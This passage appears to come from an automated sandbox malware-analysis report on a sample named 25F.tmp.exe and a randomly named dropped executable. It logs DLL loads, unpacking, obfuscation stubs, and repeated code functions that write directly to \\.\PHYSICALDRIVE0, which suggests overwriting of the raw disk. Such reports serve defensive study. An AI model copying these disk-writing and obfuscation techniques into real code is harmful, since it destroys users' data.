            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: dnsapi.dll
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: secur32.dll
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: version.dll
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: dnsapi.dll
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: secur32.dll
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: version.dll
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: dnsapi.dll
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: secur32.dll
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: version.dll
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: dnsapi.dll
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: secur32.dll
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: version.dll
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: dnsapi.dll
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: secur32.dll
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: version.dll
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: dnsapi.dll
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: secur32.dll
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: version.dll
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: dnsapi.dll
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: secur32.dll
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: version.dll
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: dnsapi.dll
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: secur32.dll
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: version.dll
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: dnsapi.dll
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: secur32.dll
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: version.dll
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: dnsapi.dll
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: secur32.dll
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: version.dll
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: dnsapi.dll
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: secur32.dll
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: version.dll
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: dnsapi.dll
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: secur32.dll
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: version.dll
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: dnsapi.dll
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: secur32.dll
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: version.dll
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: dnsapi.dll
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: secur32.dll
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: version.dll
            Source: C:\Users\user\Desktop\25F.tmp.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dllJump to behavior
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: QgGhoOpxHPl.exe, 00000009.00000002.624007678.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 0000000A.00000002.623894475.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 0000000B.00000002.624028617.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 0000000C.00000002.624002687.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 0000000D.00000002.623566344.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 0000000E.00000002.624079839.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 0000000F.00000002.623632104.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 00000010.00000002.623656498.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 00000011.00000000.386197187.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 00000012.00000002.623647954.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 00000013.00000002.623981000.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 00000014.00000000.387583156.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 00000015.00000002.623920086.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 00000016.00000002.623820405.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 00000017.00000000.391050949.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 00000019.00000002.623538208.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 0000001A.00000000.391969074.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 0000001B.00000000.392217468.000000000123E000.00000002.00000001.01000000.00000005.sdmp, 
QgGhoOpxHPl.exe, 0000001D.00000000.392771743.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 0000001E.00000002.623775125.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 0000001F.00000000.393702318.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 00000020.00000000.394071706.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 00000021.00000000.394366434.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 00000022.00000000.394702338.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 00000023.00000000.394946970.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 00000024.00000000.395128308.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 00000025.00000002.623951188.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 00000026.00000000.395491250.000000000123E000.00000002.00000001.01000000.00000005.sdmp, Qg

            Data Obfuscation

            Source: C:\Users\user\Desktop\25F.tmp.exe | Unpacked PE file: 2.2.25F.tmp.exe.400000.0.unpack
            Source: C:\Users\user\Desktop\25F.tmp.exe | Unpacked PE file: 4.2.25F.tmp.exe.360000.0.unpack
            Source: C:\Users\user\Desktop\25F.tmp.exe | Unpacked PE file: 4.2.25F.tmp.exe.400000.1.unpack
            Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: 2_2_0040399B LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 2_2_0040399B
            Source: 25F.tmp.exe | Static PE information: real checksum: 0x37c3c should be: 0x2f560
            Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: 0_2_0060502C push 006052E0h; ret 0_2_006052D8
            Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: 0_2_00604C3C push 00604C8Dh; ret 0_2_00604C85
            Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: 0_2_0060983C push 00609874h; ret 0_2_0060986C
            Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: 0_2_00609880 push 006098A6h; ret 0_2_0060989E
            Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: 0_2_00602C98 push eax; ret 0_2_00602CD4
            Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: 0_2_006085C4 push 00608740h; ret 0_2_00608738
            Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: 0_2_006085BA push 00608740h; ret 0_2_00608738
            Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: 0_2_00604E6C push 00604E98h; ret 0_2_00604E90
            Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: 0_2_00604EA4 push 00604ED0h; ret 0_2_00604EC8
            Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: 0_2_006052B4 push 006052E0h; ret 0_2_006052D8
            Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: 0_2_00608742 push 006087B3h; ret 0_2_006087AB
            Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: 0_2_00608744 push 006087B3h; ret 0_2_006087AB
            Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: 0_2_00604FF4 push 00605020h; ret 0_2_00605018
            Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: 0_2_00605FC8 push ecx; mov dword ptr [esp], eax 0_2_00605FC9
            Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: 2_2_0060502C push 006052E0h; ret 2_2_006052D8
            Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: 2_2_00604C3C push 00604C8Dh; ret 2_2_00604C85
            Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: 2_2_0060983C push 00609874h; ret 2_2_0060986C
            Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: 2_2_00609880 push 006098A6h; ret 2_2_0060989E
            Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: 2_2_00602C98 push eax; ret 2_2_00602CD4
            Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: 2_2_006085C4 push 00608740h; ret 2_2_00608738
            Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: 2_2_006085BA push 00608740h; ret 2_2_00608738
            Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: 2_2_00604E6C push 00604E98h; ret 2_2_00604E90
            Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: 2_2_00604EA4 push 00604ED0h; ret 2_2_00604EC8
            Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: 2_2_006052B4 push 006052E0h; ret 2_2_006052D8
            Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: 2_2_00608742 push 006087B3h; ret 2_2_006087AB
            Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: 2_2_00608744 push 006087B3h; ret 2_2_006087AB
            Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: 2_2_00604FF4 push 00605020h; ret 2_2_00605018
            Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: 2_2_00605FC8 push ecx; mov dword ptr [esp], eax 2_2_00605FC9
            Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: 2_2_00404290 push eax; ret 2_2_004042BE
            Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: 4_2_00370F10 push eax; ret 4_2_00370F3E
            Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: 4_2_00410F10 push eax; ret 4_2_00410F3E

            Persistence and Installation Behavior

            Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE0 4_2_00369EC0
            Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE0 4_2_00369D90
            Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE0 4_2_00409EC0
            Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE0 4_2_00409D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE0 9_2_003D9EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE0 9_2_003D9D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE0 10_2_00189EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE0 10_2_00189D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE0 11_2_00389EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE0 11_2_00389D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE0 12_2_00419EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE0 12_2_00419D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE0 13_2_001B9EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE0 13_2_001B9D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE0 14_2_00359EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE0 14_2_00359D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE0 15_2_00319EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE0 15_2_00319D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE0 16_2_00389EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE0 16_2_00389D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE0 17_2_00109EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE0 17_2_00109D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE0 18_2_00109EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE0 18_2_00109D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE0 19_2_00229EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE0 19_2_00229D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE0 20_2_00329EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE0 20_2_00329D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE0 21_2_00519EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE0 21_2_00519D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE0 22_2_00199EC0
